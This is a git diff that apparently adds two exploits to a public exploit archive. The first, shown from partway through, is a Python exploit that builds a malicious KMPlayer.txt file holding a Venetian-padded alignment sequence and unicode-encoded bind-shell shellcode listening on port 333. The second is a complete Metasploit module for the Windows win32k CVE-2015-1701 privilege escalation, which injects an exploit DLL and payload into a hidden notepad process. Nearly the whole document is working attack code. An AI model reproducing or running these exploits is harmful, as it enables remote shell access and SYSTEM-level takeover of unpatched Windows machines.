+            "\x40"  # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
+            "\x61"  # POPAD
+            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+            ""+("\x5f\x45" * 125)+""  # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
+            "\x54"  # PUSH ESP
+            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+            "\x45"  # Padding => INC EBP
+            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+            "\x61"  # POPAD
+            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
+            "\x58"  # POP EAX
+            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
+            "\x58"  # POP EAX
+            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
+            "\x5d"  # POP EBP
+            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+            "\x71"  # Padding => JNO SHORT 0x2
+            "\x71"  # Venetian Padding => ADD BYTE PTR DS:[ECX],DH
+         )
+
+# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
+shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+             "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+             "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
+             "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
+             "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
+             "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+             "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
+             "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
+             "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
+             "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
+             "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
+             "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
+             "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
+             "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
+             "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
+             "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
+             "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
+             "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
+             "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
+             "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
+             "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
+             "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
+             "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
+             "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
+             "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
+             "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
+             "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
+             "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
+             "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
+             "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
+             "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
+             "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
+             "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
+             "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
+             "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
+             "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
+             "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
+             "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
+             "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
+             "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
+             "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
+             "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
+             "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
+             "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
+             "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
+             "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
+             "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
+             "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
+             "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
+             "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
+             "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
+             "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
+             "\x41\x41")
+
+buffer += shellcode + "\x71" * (1534 - len(shellcode))
+
+open("KMPlayer.txt", "wb").write(buffer)
\ No newline at end of file
diff --git a/platforms/windows/local/37367.rb b/platforms/windows/local/37367.rb
new file mode 100755
index 000000000..6dfb345d6
--- /dev/null
+++ b/platforms/windows/local/37367.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'            => 'Windows ClientCopyImage Win32k Exploit',
+      'Description'     => %q{
+        This module exploits improper object handling in the win32k.sys kernel mode driver.
+        This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
+        Windows 2008 R2 SP1 x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+          'Unknown',    # vulnerability discovery and exploit in the wild
+          'hfirefox',   # Code released on github
+          'OJ Reeves'   # msf module
+        ],
+      'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'metrepreter' ],
+      'DefaultOptions'  => {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'Payload'         => {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'      => [
+          ['CVE', '2015-1701'],
+          ['MSB', 'MS15-051'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
+          ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
+          ['URL', 'https://technet.microsoft.com/library/security/MS15-051']
+        ],
+      'DisclosureDate'  => 'May 12 2015',
+      'DefaultTarget'   => 0
+    }))
+  end
+
+  def check
+    # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
+    # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
+    # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
+
+    if sysinfo['OS'] !~ /windows/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    if sysinfo['Architecture'] =~ /(wow|x)64/i
+      arch = ARCH_X86_64
+    elsif sysinfo['Architecture'] =~ /x86/i
+      arch = ARCH_X86
+    end
+
+    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    return Exploit::CheckCode::Safe if build == 7601
+
+    return Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Metrepreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    if target.arch.first == ARCH_X86
+      dll_file_name = 'cve-2015-1701.x86.dll'
+    else
+      dll_file_name = 'cve-2015-1701.x64.dll'
+    end
+
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  end
+
+end
\ No newline at end of file